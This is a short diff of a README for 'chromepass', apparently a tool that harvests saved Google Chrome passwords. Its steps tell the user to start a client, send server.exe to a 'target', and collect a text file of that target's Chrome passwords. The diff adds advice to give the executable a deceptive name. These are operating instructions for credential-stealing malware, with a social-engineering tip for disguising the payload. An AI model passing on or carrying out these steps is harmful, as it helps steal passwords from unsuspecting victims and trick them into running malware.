darkarp/chromepass/README.md

 	2. Start the client.exe (I recommend having the client in a directory in "C:\", like "C:\ChromePass\client.exe")

-	3. Send the server.exe to your target.
+	3. Send the server.exe to your target (choosing an appropriate name is always important)

 	4. Obtain a password text file in the same location as the client with all the Google Chrome Passwords.